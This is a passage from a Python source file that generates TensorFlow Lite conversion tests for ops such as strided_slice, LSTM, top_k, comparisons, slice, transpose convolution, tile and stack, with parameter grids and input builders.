"strides": [[-2], [-1], [1], [2]],
"begin_mask": [0, 1],
"end_mask": [0, 1],
"shrink_axis_mask": [0],
"constant_indices": [False],
},
]
_make_strided_slice_tests(options, test_parameters)
# For verifying https://github.com/tensorflow/tensorflow/issues/23599
# TODO(chaomei): refactor the test to cover more cases, like negative stride,
# negative array index etc.
@register_make_test_function()
def make_resolve_constant_strided_slice_tests(options):
"""Make a set of tests to show strided_slice yields incorrect results."""
test_parameters = [{
"unused_iteration_counter": [1],
}]
def build_graph(parameters):
"""Build the strided_slice op testing graph."""
del parameters
input_values = tf.placeholder(dtype=tf.float32, shape=[4, 2])
data = tf.constant([[0, 1, 2, 3],
[4, 5, 6, 7],
[8, 9, 10, 11],
[12, 13, 14, 15]], tf.float32)
return [input_values], [input_values + data[:, :2]]
def build_inputs(parameters, sess, inputs, outputs):
del parameters
input_values = np.zeros([4, 2], dtype=np.float32)
return [input_values], sess.run(
outputs, feed_dict={inputs[0]: input_values})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_lstm_tests(options):
"""Make a set of tests to do basic Lstm cell."""
test_parameters = [
{
"dtype": [tf.float32],
"num_batchs": [1],
"time_step_size": [1],
"input_vec_size": [3],
"num_cells": [4],
"split_tflite_lstm_inputs": [False],
},
]
def build_graph(parameters):
"""Build a simple graph with BasicLSTMCell."""
num_batchs = parameters["num_batchs"]
time_step_size = parameters["time_step_size"]
input_vec_size = parameters["input_vec_size"]
num_cells = parameters["num_cells"]
inputs_after_split = []
for i in xrange(time_step_size):
one_timestamp_input = tf.placeholder(
dtype=parameters["dtype"],
name="split_{}".format(i),
shape=[num_batchs, input_vec_size])
inputs_after_split.append(one_timestamp_input)
    # Currently the LSTM identifier has a few limitations: it only supports
    # forget_bias == 0 and tanh as the inner state activation.
# TODO(zhixianyan): Add another test with forget_bias == 1.
# TODO(zhixianyan): Add another test with relu as activation.
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_cells, forget_bias=0.0, state_is_tuple=True)
cell_outputs, _ = rnn.static_rnn(
lstm_cell, inputs_after_split, dtype=tf.float32)
out = cell_outputs[-1]
return inputs_after_split, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Feed inputs, assign variables, and freeze graph."""
with tf.variable_scope("", reuse=True):
kernel = tf.get_variable("rnn/basic_lstm_cell/kernel")
bias = tf.get_variable("rnn/basic_lstm_cell/bias")
kernel_values = create_tensor_data(
parameters["dtype"], [kernel.shape[0], kernel.shape[1]], -1, 1)
bias_values = create_tensor_data(parameters["dtype"], [bias.shape[0]], 0,
1)
sess.run(tf.group(kernel.assign(kernel_values), bias.assign(bias_values)))
num_batchs = parameters["num_batchs"]
time_step_size = parameters["time_step_size"]
input_vec_size = parameters["input_vec_size"]
input_values = []
for _ in xrange(time_step_size):
tensor_data = create_tensor_data(parameters["dtype"],
[num_batchs, input_vec_size], 0, 1)
input_values.append(tensor_data)
out = sess.run(outputs, feed_dict=dict(zip(inputs, input_values)))
return input_values, out
# TODO(zhixianyan): Automatically generate rnn_states for lstm cell.
extra_toco_options = ExtraTocoOptions()
extra_toco_options.rnn_states = (
"{state_array:rnn/BasicLSTMCellZeroState/zeros,"
"back_edge_source_array:rnn/basic_lstm_cell/Add_1,size:4},"
"{state_array:rnn/BasicLSTMCellZeroState/zeros_1,"
"back_edge_source_array:rnn/basic_lstm_cell/Mul_2,size:4}")
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
extra_toco_options,
use_frozen_graph=True)
def make_l2_pool(input_tensor, ksize, strides, padding, data_format):
"""Given an input perform a sequence of TensorFlow ops to produce l2pool."""
return tf.sqrt(tf.nn.avg_pool(
tf.square(input_tensor), ksize=ksize, strides=strides,
padding=padding, data_format=data_format))
@register_make_test_function()
def make_topk_tests(options):
"""Make a set of tests to do topk."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[10], [5, 20]],
"input_k": [None, 1, 3],
}]
def build_graph(parameters):
"""Build the topk op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["input_k"] is not None:
k = tf.placeholder(dtype=tf.int32, name="input_k", shape=[])
inputs = [input_value, k]
else:
k = tf.constant(3, name="k")
inputs = [input_value]
out = tf.nn.top_k(input_value, k)
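    # tf.nn.top_k returns (values, indices); only the indices output is
    # checked.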
return inputs, [out[1]]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
if parameters["input_k"] is not None:
k = np.array(parameters["input_k"], dtype=np.int32)
return [input_value, k], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value, k])))
else:
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_arg_min_max_tests(options):
"""Make a set of tests to do arg_max."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [1, 1, 1, 3], [2, 3, 4, 5], [2, 3, 3], [5, 5], [10]],
"output_type": [tf.int32, tf.int64],
"is_arg_max": [True],
}]
def build_graph(parameters):
"""Build the topk op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
axis = random.randint(0, max(len(parameters["input_shape"]) - 1, 0))
if parameters["is_arg_max"]:
out = tf.arg_max(input_value, axis, output_type=parameters["output_type"])
else:
out = tf.arg_min(input_value, axis, output_type=parameters["output_type"])
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=4)
@register_make_test_function()
def make_equal_tests(options):
"""Make a set of tests to do equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([], []),
([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_not_equal_tests(options):
"""Make a set of tests to do not equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the not euqal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.not_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_greater_tests(options):
"""Make a set of tests to do greater."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the greater op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.greater(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_greater_equal_tests(options):
"""Make a set of tests to do greater_equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the greater_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.greater_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_less_tests(options):
"""Make a set of tests to do less."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the less op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.less(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_less_equal_tests(options):
"""Make a set of tests to do less_equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the less_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.less_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_floor_tests(options):
"""Make a set of tests to do floor."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the floor op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.floor(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_ceil_tests(options):
"""Make a set of tests to do ceil."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the ceil op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.ceil(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_round_tests(options):
"""Build the round op testing graph."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the round op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.round(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_neg_tests(options):
"""Make a set of tests to do neg."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [5], []],
}]
def build_graph(parameters):
"""Build the neg op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.negative(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [values], sess.run(outputs, feed_dict=dict(zip(inputs, [values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_zeros_like_tests(options):
"""Make a set of tests to do zeros_like."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the zeros_like op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
zeros = tf.zeros_like(input_tensor)
    # This maximum node is here so that toco can perform the
    # constants-propagation through the above zeros_like, which it can't do if
    # the output of the zeros_like is an output of the whole graph (graph
    # outputs can't be constants). If toco does not perform such
    # constants-propagation then the resulting tflite graph retains the
    # zeros_like as a Fill op, which is unsupported by TFLite, even as a
    # custom op.
out = tf.maximum(zeros, input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [values], sess.run(outputs, feed_dict=dict(zip(inputs, [values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
def _make_elementwise_tests(op):
"""Make a set of tests to do element-wise operations."""
def f(options):
"""Actual function that generates examples."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the unary op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = op(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
return f
@register_make_test_function()
def make_sin_tests(options):
"""Make a set of tests to do sin."""
return _make_elementwise_tests(tf.sin)(options)
@register_make_test_function()
def make_log_tests(options):
"""Make a set of tests to do log."""
return _make_elementwise_tests(tf.log)(options)
@register_make_test_function()
def make_sqrt_tests(options):
"""Make a set of tests to do sqrt."""
return _make_elementwise_tests(tf.sqrt)(options)
@register_make_test_function()
def make_rsqrt_tests(options):
"""Make a set of tests to do 1/sqrt."""
return _make_elementwise_tests(tf.rsqrt)(options)
@register_make_test_function()
def make_square_tests(options):
"""Make a set of tests to do square."""
return _make_elementwise_tests(tf.square)(options)
@register_make_test_function()
def make_where_tests(options):
"""Make a set of tests to do where."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape_set": [([1, 2, 3, 4], [1, 2, 3, 4]),],
}]
def build_graph(parameters):
"""Build the where op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_set"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input3",
shape=parameters["input_shape_set"][1])
less = tf.less(input_value1, input_value2)
out = tf.where(less, input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_set"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_set"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_slice_tests(options):
"""Make a set of tests to do slice."""
# TODO(renjieliu): add test/support for uint8.
test_parameters = [
# 4-D
{
"dtype": [tf.float32, tf.int32, tf.int64, tf.string],
"index_type": [tf.int32, tf.int64],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0, 0, 0, 0], [1, 0, 1, 0]],
"size": [[8, 2, 2, 3], [11, 2, 1, 5]],
},
# 2-D
{
"dtype": [tf.float32, tf.int32, tf.int64, tf.string],
"index_type": [tf.int32, tf.int64],
"input_shape": [[2, 3]],
"begin": [[0, 0], [1, 0]],
"size": [[2, 3], [2, 2]],
},
# 4-D with size -1
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[4, 4, 4, 4]],
"begin": [[0, 0, 0, 0], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0],
[0, 0, 0, 1]],
"size": [[-1, 1, 1, 1], [1, -1, 1, 1], [1, 1, -1, 1], [1, 1, 1, -1]],
},
]
def build_graph(parameters):
"""Build graph for slice test."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
begin = tf.placeholder(
dtype=parameters["index_type"],
name="begin",
shape=[len(parameters["input_shape"])])
size = tf.placeholder(
dtype=parameters["index_type"],
name="size",
shape=[len(parameters["input_shape"])])
tensors = [input_tensor, begin, size]
out = tf.slice(input_tensor, begin, size)
return tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build inputs for slice test."""
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
index_type = _TF_TYPE_INFO[parameters["index_type"]][0]
begin_values = np.array(parameters["begin"]).astype(index_type)
size_values = np.array(parameters["size"]).astype(index_type)
values = [input_values, begin_values, size_values]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=24)
@register_make_test_function()
def make_conv2d_transpose_tests(options):
"""Make a set of tests to do transpose_conv."""
test_parameters = [{
"input_shape": [[1, 50, 54, 3]],
"filter_shape": [[1, 1, 8, 3], [1, 2, 8, 3], [1, 3, 8, 3], [1, 4, 8, 3]],
"output_shape": [[1, 100, 108, 8]],
"dynamic_output_shape": [True, False],
}, {
"input_shape": [[1, 16, 1, 512]],
"filter_shape": [[4, 1, 512, 512]],
"output_shape": [[1, 32, 1, 512]],
"dynamic_output_shape": [True, False],
}, {
"input_shape": [[1, 128, 128, 1]],
"filter_shape": [[4, 4, 1, 1]],
"output_shape": [[1, 256, 256, 1]],
"dynamic_output_shape": [True, False],
}]
def build_graph(parameters):
"""Build a transpose_conv graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
filter_tensor = tf.placeholder(
dtype=tf.float32, name="filter", shape=parameters["filter_shape"])
input_tensors = [input_tensor, filter_tensor]
if parameters["dynamic_output_shape"]:
output_shape = tf.placeholder(dtype=tf.int32, shape=[4])
input_tensors.append(output_shape)
else:
output_shape = parameters["output_shape"]
out = tf.nn.conv2d_transpose(
input_tensor,
filter_tensor,
output_shape=output_shape,
padding="SAME",
strides=(1, 2, 2, 1))
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(np.float32, parameters["input_shape"]),
create_tensor_data(np.float32, parameters["filter_shape"])
]
if parameters["dynamic_output_shape"]:
values.append(np.array(parameters["output_shape"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Since computing the output shape for tf.nn.conv2d_transpose (the input_sizes
# argument of tf.nn.conv2d_backprop_input) is fairly complicated, we first
# perform a "conv2d" operation to get an output tensor, and then use that
# output to feed tf.nn.conv2d_backprop_input.
# This test therefore depends on the "conv2d" operation's correctness.
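# For illustration only (not part of the generated tests): with "SAME" padding
# and equal strides s, tf.nn.conv2d maps a spatial dimension H to ceil(H / s),
# and tf.nn.conv2d_backprop_input always produces a tensor whose shape equals
# its input_sizes argument, so passing the original input_shape below recovers
# a result with exactly the original input's shape.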
@register_make_test_function()
def make_transpose_conv_tests(options):
"""Make a set of tests to do transpose_conv."""
# Tensorflow only supports equal strides
test_parameters = [{
"input_shape": [[1, 3, 4, 1], [1, 10, 10, 3], [3, 20, 20, 1]],
"filter_size": [[1, 1], [1, 2], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 3, 3, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"],
"channel_multiplier": [1, 2],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_size"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a transpose_conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
conv_outputs = tf.nn.conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
padding=parameters["padding"],
data_format=parameters["data_format"])
out = tf.nn.conv2d_backprop_input(
input_shape,
filter_input,
conv_outputs,
strides=parameters["strides"],
padding=parameters["padding"],
data_format=parameters["data_format"])
input_tensors = [input_tensor, filter_input]
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [
create_tensor_data(np.float32, input_shape),
create_tensor_data(np.float32, filter_shape)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_tile_tests(options):
"""Make a set of tests to do tile."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.bool],
"input_shape": [[3, 2, 1], [2, 2, 2]],
"multiplier_dtype": [tf.int32, tf.int64],
"multiplier_shape": [[3]]
}]
def build_graph(parameters):
"""Build the tile op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
shape=parameters["input_shape"],
name="input")
multiplier_value = tf.placeholder(
dtype=parameters["multiplier_dtype"],
shape=parameters["multiplier_shape"],
name="multiplier")
out = tf.tile(input_value, multiplier_value)
return [input_value, multiplier_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
multipliers_value = create_tensor_data(
parameters["multiplier_dtype"],
parameters["multiplier_shape"],
min_value=0)
return [input_value, multipliers_value], sess.run(
outputs,
feed_dict={
inputs[0]: input_value,
inputs[1]: multipliers_value
})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_expand_dims_tests(options):
"""Make a set of tests to do expand_dims."""
test_parameters = [{
"input_type": [tf.float32, tf.int32],
"input_shape": [[5, 4]],
"axis_value": [0, 1, 2, -1, -2, -3],
"constant_axis": [True, False],
}]
def build_graph(parameters):
"""Build the where op testing graph."""
inputs = []
input_value = tf.placeholder(
dtype=parameters["input_type"],
name="input",
shape=parameters["input_shape"])
inputs.append(input_value)
if parameters["constant_axis"]:
axis_value = tf.constant(
parameters["axis_value"], dtype=tf.int32, shape=[1])
else:
axis_value = tf.placeholder(dtype=tf.int32, name="axis", shape=[1])
inputs.append(axis_value)
out = tf.expand_dims(input_value, axis=axis_value)
return inputs, [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
input_values.append(
create_tensor_data(parameters["input_type"], parameters["input_shape"]))
if not parameters["constant_axis"]:
input_values.append(np.array([parameters["axis_value"]], dtype=np.int32))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_sparse_to_dense_tests(options):
"""Make a set of tests to do sparse to dense."""
test_parameters = [{
"value_dtype": [tf.float32, tf.int32, tf.int64],
"index_dtype": [tf.int32, tf.int64],
"value_count": [1, 3, 6, 8],
"dense_shape": [[15], [3, 10], [4, 4, 4, 4], [7, 10, 9]],
"default_value": [0, -1],
"value_is_scalar": [True, False],
}]
# Return a single value for 1-D dense shape, but a tuple for other shapes.
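  # For example (illustrative values only): dense_shape=[15] might yield 7,
  # while dense_shape=[3, 10] might yield the tuple (2, 4).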
def generate_index(dense_shape):
if len(dense_shape) == 1:
return np.random.randint(dense_shape[0])
else:
index = []
for shape in dense_shape:
index.append(np.random.randint(shape))
return tuple(index)
def build_graph(parameters):
"""Build the sparse_to_dense op testing graph."""
dense_shape = parameters["dense_shape"]
    # Special handling for the value_is_scalar case.
    # value_count must be 1.
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
value = tf.placeholder(
name="value", dtype=parameters["value_dtype"], shape=())
else:
value = tf.placeholder(
name="value",
dtype=parameters["value_dtype"],
shape=[parameters["value_count"]])
indices = set()
while len(indices) < parameters["value_count"]:
indices.add(generate_index(dense_shape))
indices = tf.constant(tuple(indices), dtype=parameters["index_dtype"])
# TODO(renjieliu): Add test for validate_indices case.
out = tf.sparse_to_dense(
indices,
dense_shape,
value,
parameters["default_value"],
validate_indices=False)
return [value], [out]
def build_inputs(parameters, sess, inputs, outputs):
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
input_value = create_scalar_data(parameters["value_dtype"])
else:
input_value = create_tensor_data(parameters["value_dtype"],
[parameters["value_count"]])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_pack_tests(options):
"""Make a set of tests to do stack."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [1, 2, 3, 4, 5, 6],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
},
{
"dtype": [tf.int32],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [6],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
},
{
"dtype": [tf.int64],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [5],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
}
]
def get_shape(parameters):
"""Return a tweaked version of 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
if axis < len(shape):
shape[axis] += parameters["additional_shape"]
return shape
def build_graph(parameters):
all_tensors = []
for n in range(0, parameters["num_tensors"]):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name=("input%d" % n),
shape=get_shape(parameters))
all_tensors.append(input_tensor)
out = tf.stack(all_tensors, parameters["axis"])
return all_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
all_values = []
for _ in range(0, parameters["num_tensors"]):
input_values = create_tensor_data(np.float32, get_shape(parameters))
all_values.append(input_values)
return all_values, sess.run(
outputs, feed_dict=dict(zip(inputs, all_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=72)
@register_make_test_function()
def make_unpack_tests(options):
"""Make a set of tests to do unstack."""
test_parameters = [{
"base_shape": [[3, 4, 3], [3, 4], [5, 6, 7, 8]],
"axis": [0, 1, 2, 3],
}]
def get_valid_axis(parameters):
"""Return a tweaked version of 'axis'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
